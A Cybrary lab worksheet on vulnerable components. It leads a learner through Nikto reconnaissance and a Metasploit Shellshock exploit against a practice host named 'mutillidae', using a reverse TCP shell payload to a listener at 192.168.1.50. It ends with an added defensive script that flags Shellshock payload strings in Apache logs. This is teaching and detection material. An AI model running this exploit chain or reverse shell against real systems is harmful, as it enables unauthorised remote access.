Module 10 Using Components with Known Vulnerabilities Lab

Description: In this lab, you will identify and exploit a simple example of using components
with known vulnerabilities. We will use Nikto, a tool normally used in the footprinting
(information gathering) phase of penetration testing, along with Metasploit and wget.
Requirements: You will need access to the Cybrary lab environment for this lab.

Step 1: Log into Cybrary.
Step 2: Launch the OWASP Using Components with Known Vulnerabilities lab by
searching for it in the catalog and selecting the launch button.
Note: It may take 30-40 seconds for the lab to launch after clicking the button.
Step 3: When the lab opens, you will see a pop-up box. Select the Next button, then Ok to
close the pop-up box.
Step 4: You will then be taken to the Kali Linux login screen.
Step 5: Enter a username of student and a password of student to log into the desktop.
Step 6: Next, launch a Terminal window by clicking the small black box on the left-side
menu.
Step 7: Next, type the following command in the Terminal window and press Enter.
nikto -host mutillidae

Note: It might take a minute or two for it to run.

Question 1: Was a robots.txt file found? _____________________________________

Step 8: Next, we will retrieve the robots.txt file.
Step 9: Enter the following command at the Terminal prompt and press Enter.
wget mutillidae/robots.txt -O- 2>/dev/null
Note: The O is a capital letter O, not the number zero.

 
Brought to you by: Develop your team with the fastest growing catalog in the
cybersecurity industry. Enterprise-grade workforce development
management, advanced training features and detailed skill gap and
competency analytics.

Question 2: Are there any items not allowed to be indexed by search engines?
______________________________________________________________

Step 10: Next, we will retrieve the output from the status.cgi script mentioned in the
robots.txt file.
Step 11: Enter the following command at the prompt and press Enter.
wget mutillidae/cgi-bin/status.cgi -O- 2>/dev/null

Question 3: Do you see any information about the operating system in use?
___________________________________________________________

Step 12: The output shows an older Linux OS in use, so we are going to attempt the
Shellshock exploit against it. Older Linux systems that run a CGI script like this one
through an unpatched Bash are normally vulnerable to this attack.
Step 13: Enter this command at the Terminal and press Enter to run Metasploit.
sudo msfconsole

Step 14: Next, type this command and press Enter.
search shellshock

Step 15: Next, type the following command at the Terminal and press Enter.
use auxiliary/scanner/http/apache_mod_cgi_bash_env

Step 16: Next, we can type the info command and press Enter to learn more about the
Metasploit module we are working with.
Step 17: Next, type the following commands and press Enter after each one.
set RHOSTS mutillidae
set TARGETURI /cgi-bin/status.cgi

 
Step 18: Now that we have set our parameters, we can run the tool.
Step 19: Type run and press Enter.
Note: Since we see results from the id command (uid=33, gid=33), we are able to
determine that the server is vulnerable. Now we will use Shellshock to attack the server.
Step 20: Type the following command at the Terminal and press Enter.
use exploit/multi/http/apache_mod_cgi_bash_env_exec

Step 21: Next, type show options at the Terminal and press Enter.
Step 22: Next, we will set our options for the attack.
Step 23: Type the following in the Terminal window and press Enter after each one.
set RHOST mutillidae
set TARGETURI /cgi-bin/status.cgi

Step 24: Next, we are going to specify a reverse shell as our payload for this attack.
Step 25: At the Terminal, type the following command and press Enter.
set PAYLOAD linux/x86/shell_reverse_tcp

Step 26: Next, type show options and press Enter.
Step 27: At the prompt, type the following command and press Enter.
set LHOST 192.168.1.50

Step 28: Next, we will finally run our exploit by typing run in the prompt and pressing Enter.

Question 4: Were you successful in opening a command shell? ________________

Step 29: Next, type the following command and press Enter, so we can interact with the
background session on the target.
sessions -i -1

 
Step 30: Type ifconfig and press Enter.
Step 31: Type id and press Enter.

Question 5: What output do you see? ______________________________________
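
Defender's view of Steps 12 to 28, as an added example that is not part of the original lab: a Shellshock request delivers a Bash function definition, a value beginning with `() {`, in an HTTP header, so it can be spotted in web server logs. The function names, the Apache combined log format and the sample log lines below are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag Shellshock-style header values in an Apache
# "combined" format access log. All names here are hypothetical.

# Constructed sample log lines (documentation IP ranges, harmless marker text).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 310 "-" "() { :; }; echo constructed-probe"
192.0.2.77 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 0 "() { :; }; echo constructed-probe" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "ExampleBot/1.0 (+http://example.com/bot)"
EOF
}

# Read log lines on stdin; print "client-ip path field" for every request
# whose logged Referer or User-Agent starts with a Bash function definition.
shellshock_hits() {
  awk -F'"' '
    {
      split($1, pre, " ")   # pre[1] = client IP
      split($2, req, " ")   # req[2] = requested path
      # Quoted fields: $2 request line, $4 Referer, $6 User-Agent.
      for (i = 4; i <= NF; i++) {
        # The marker must open the value; spacing is matched loosely.
        if ($i ~ /^[ \t]*[(][)][ \t]*[{]/) {
          if (i == 4) label = "referer"
          else if (i == 6) label = "user-agent"
          else label = "other"
          print pre[1], req[2], label
          break               # one report line per request
        }
      }
    }'
}

# Summarise hits as "count client-ip", for triage or blocking decisions.
shellshock_sources() {
  cut -d' ' -f1 | sort | uniq -c | awk '{ print $1, $2 }'
}

sample_log | shellshock_hits
sample_log | shellshock_hits | shellshock_sources
```

The combined log format records only the Referer and User-Agent headers, so a marker sent in any other header will not appear here; catching those needs a custom log format or inspection at a proxy or WAF.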

 